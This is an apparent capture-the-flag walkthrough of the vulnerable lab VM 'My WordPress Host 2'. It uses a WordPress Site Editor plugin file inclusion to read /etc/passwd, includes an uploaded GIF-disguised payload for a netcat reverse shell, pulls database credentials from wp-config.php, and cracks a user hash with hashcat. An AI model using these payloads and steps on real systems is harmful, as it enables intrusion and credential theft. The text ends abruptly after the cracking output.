My WordPress Host 2 -: Walkthrough Infosec Warrior

5 min readJan 5, 2021

Today we’ll be continuing with our new machine on Infosec Warrior. In this article, we will see a walkthrough of an interesting Infosec Warrior machine called My WordPress Host 2.

here is the link to downlaod this VM:-

https://www.infosecwarrior.com/my-wordpress-host-2/

Network Scanning

We always start with network scanning, Let’s find the target IP address by running netdiscover.

┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0

As we saw in netdiscover result. Our target ip address is 192.168.43.94

Enumeration/Reconnaissance

Our next step is scanning the target machine. let’s start with nmap.

┌─[✗]─[root@RDX]─[~]
└──╼#nmap -v -sT 192.168.43.94

With the help of nmap we are able to scan all open tcp ports
Starting with the port number 80 which is http,

┌─[root@RDX]─[~]
└──╼ #vim /etc/hosts

open in browser http://192.168.43.94/

┌─[✗]─[root@RDX]─[~]
└──╼ #wpscan — url http://192.168.43.94/ — enumerate ap — plugins-detection Aggressive

go to with the site editor

Find the exploit on web

EXPLOIT —

http://www.infosec.local/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

convert payload name in gif or jpg .

upload the abc.gif payload in contact us

call the gif payload in browser

http://www.infosec.local/wp-content/uploads/2020/12/abc.gif

┌─[✗]─[root@RDX]─[~]
└──╼ #nc -nlvp 443

then use this payload in browser for reverse shell

http://www.infosec.local/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/www/html/wordpress/wp-content/uploads/2020/12/abc.gif

now i got the shell

$ id

$ python3.7 -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@wordpress:/$

www-data@wordpress:/$ cd /var/www/html/wordpress

www-data@wordpress:/var/www/html/wordpress$ cat wp-config.php

/** MySQL database username */
define( ‘DB_USER’, ‘root’ );

/** MySQL database password */
define( ‘DB_PASSWORD’, ‘root’ );

Privilege Escalation

www-data@wordpress:/$ mysql -u root -p
mysql -u root -p
Enter password: root

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 19
Server version: 5.7.29 MySQL Community Server (GPL)
Copyright © 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
mysql> show databases ;

mysql> use wordpress_db ;

mysql> show tables;

mysql> select * from wp_users ;
mysql> exit ;

┌─[root@RDX]─[~]
└──╼ #vim password.txt

$P$B19rxcYf6F/GwIJZ.OJuOvgtfjiWkW.

┌─[root@RDX]─[~]
└──╼ #hashcat -m 400 -a 0 -o pass.txt password.txt /root/rockyou.txt

hashcat (v6.1.1) starting…
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause “CL_OUT_OF_RESOURCES” or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
This may cause “CL_OUT_OF_RESOURCES” or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported
CUDA API (CUDA 11.0)
====================
* Device #1: GeForce GTX 1650, 3844/3911 MB, 16MCU
OpenCL API (OpenCL 1.2 CUDA 11.0.228) — Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: GeForce GTX 1650, skipped
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) — Platform #2 [The pocl project]
=============================================================================================================================
* Device #3: pthread-AMD Ryzen 7 3750H with Radeon Vega Mobile Gfx, skipped
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 345 MB
Dictionary cache built:
* Filename..: /root/rockyou.txt
* Passwords.: 14344392
* Bytes…..: 139921507
* Keyspace..: 14344385
* Runtime…: 1 sec
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password- and salt-length (typically down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
Session……….: hashcat
Status………..: Cracked
Hash.Name……..: phpass
Hash.Target……: $P$B19rxcYf6F/GwIJZ.OJuOvgtfjiWkW.
Time.Started…..: Wed Dec 30 20:32:08 2020 (25 secs)
Time.Estimated…: Wed Dec 30 20:32:33 2020 (0 secs)
Guess.Base…….: File (/root/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 442.6 kH/s (6.68ms) @ Accel:32 Loops:64 Thr:1024 Vec:1
Recovered……..: 1/1 (100.00%) Digests
Progress………: 11010048/14344385 (76.76%)
Rejected………: 0/11010048 (0.00%)
Restore.Point….: 10485760/14344385 (73.10%)
Restore.Sub.#1…: Salt:0 Amplifier:0–1 Iteration:8128–8192
Candidates.#1….: XiaoNianNian -> Joytjiong1
Hardware.Mon.#1..: Temp: 49c Util: 65% Core:1620MHz Mem:3500MHz Bus:8
Started: Wed Dec 30 20:32:00 2020
Stopped: Wed Dec 30 20:32:34 2020